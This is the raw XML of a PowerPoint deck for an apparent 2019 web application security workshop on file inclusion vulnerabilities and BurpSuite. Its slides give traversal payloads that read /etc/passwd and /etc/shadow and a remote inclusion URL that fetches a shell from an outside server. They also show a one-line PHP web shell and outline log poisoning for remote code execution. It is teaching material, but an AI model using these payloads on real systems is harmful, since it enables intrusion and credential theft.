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74074" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="84" d="100"/>
          <a:sy n="84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2BD5-D9F3-41DA-B557-6AF7054C3B9B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776A5-170C-410A-8A72-FEEAF706F5E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88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41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41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776A5-170C-410A-8A72-FEEAF706F5E4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100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8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817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752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98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83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426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11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14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243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00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8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120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1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03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2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D5C039-0959-4415-8AA5-45886C5F6194}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>7/3/19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CBD8EB-51D3-4328-87B2-CABD488309B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10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?page=../../../etc/pass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xample.com/?page=../../../var/log/apache/access.log" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/?page=../../../etc/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?page=../../../var/log/apache/access.lo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5E457-20A6-4410-BD15-F04118F901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21913" r="36559" b="9091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5D8A86-393E-B547-98E5-6DC4D8021A74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7286776" y="1490895"/>
            <a:ext cx="4042553" cy="1141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Workshop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F3D87-A43B-294B-AA32-A17190A216D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7437407" y="2687637"/>
            <a:ext cx="43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Web application security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28189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7C8-FEA0-864C-ADA6-BC59466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inclusion vulnerabilities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D43E-1DA8-7B4F-B648-EEEF72FE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example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php?fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>upload.php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include( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ); ?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225118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E04B-3143-214C-BAE1-3EAD3517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48" y="187036"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local file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1D7-B41B-A84F-B39A-A0090D28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047999"/>
            <a:ext cx="10018713" cy="3124201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com/?page=../../../etc/passwd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http://example.com/?page=../../../etc/shadow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http://example.com/?page=../../../var/log/apache/access.log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5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3C78-9B15-4140-B596-FE37CA8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 – Remote file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81C8-D6F6-EA49-9F0C-46B0A692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example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php?fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>myserver.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell.txt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D9FF-B03F-7B4F-A99A-5B79FB27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4F45-B98B-7B40-868B-2E68EEA6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echo system($_REQUEST[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’]); ?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40154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AB88-643D-8945-934F-800076BC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71DBE-CAD7-E946-A0F2-E5B686FE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9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1618-B858-8E45-9D77-D19E5ED7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LFI to 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80D0-D0A1-0B43-B6DE-E4AC8BFB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http://example.com/?page=../../../var/log/apache/access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ???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6146-5B0D-9E4E-A5A7-6989B234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56409A-96DB-B642-9CEE-7AE3D4B7B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111" y="339564"/>
            <a:ext cx="9223378" cy="58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B44F-BB53-A948-A36F-7F135D0E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1FF54-3BDD-BC43-B73E-DD71E802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request to the server and include a PHP shell in the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> through the User-Agent string, any header will do!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browse to the log via the LFI vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Achieve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30542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D90F-459B-774F-B087-97AFD887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45C6-0150-A545-BDEB-2CADE472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B402-1FB3-E745-8068-764770DA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30F6-D541-2A44-A7D4-AD7AB97E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and configuring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overview of important </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> principles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Continue working on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start working on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> based problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whatever we have time for!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5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8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2852CD-C9A9-9546-9BD5-C46C92DC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906" y="541782"/>
            <a:ext cx="8953500" cy="5372100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="571500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41810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18E8-5C6A-1948-B3E5-A53F305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14401"/>
            <a:ext cx="10018713" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proxy for intercepting, inspecting and altering HTTP requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains a wide range of wide range of web app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> related functionalities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464F-2D84-E645-8437-05748830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75688"/>
            <a:ext cx="10018713" cy="2075688"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installation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94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0819-D675-C641-9DBD-06179A91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1419"/>
            <a:ext cx="10018713" cy="3449782"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking the host – server side attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking the user – client side attacks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8F546-85A9-2343-85E1-B5D9E988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11727"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Principles </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24669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F91C-F7A5-CC48-8405-01D3E53B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side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6438-9418-C34F-AC1B-E186444F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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File Inclusion vulnerabilities </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10850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200A-EA34-4342-B05A-5FC7E229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F1E8-E4BA-994A-B347-45EE38ED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redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross Site Scripting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross Site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web cache deception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0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FD4F-88B5-F349-B9B2-C1929BDF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A559-B25F-1E41-BD71-43F015A5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too much to teach in web application security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Focus on one topic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide a template for learning about other topics on your own</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2870774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307</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>56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Corbel</vt:lpstr>
      <vt:lpstr>Parallax</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What will we cover today?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Installation and configuration</vt:lpstr>
      <vt:lpstr>Basic Principles </vt:lpstr>
      <vt:lpstr>Server side attacks</vt:lpstr>
      <vt:lpstr>Client side attacks</vt:lpstr>
      <vt:lpstr>Today’s focus</vt:lpstr>
      <vt:lpstr>File inclusion vulnerabilities </vt:lpstr>
      <vt:lpstr>Local file inclusion</vt:lpstr>
      <vt:lpstr>RFI – Remote file inclusion</vt:lpstr>
      <vt:lpstr>PHP Shell?</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>LFI to RCE</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The attack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Stephenson</dc:creator>
  <cp:lastModifiedBy>John Stephenson</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-12T00:20:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-12T12:38:38Z</dcterms:modified>
</cp:coreProperties>
</file>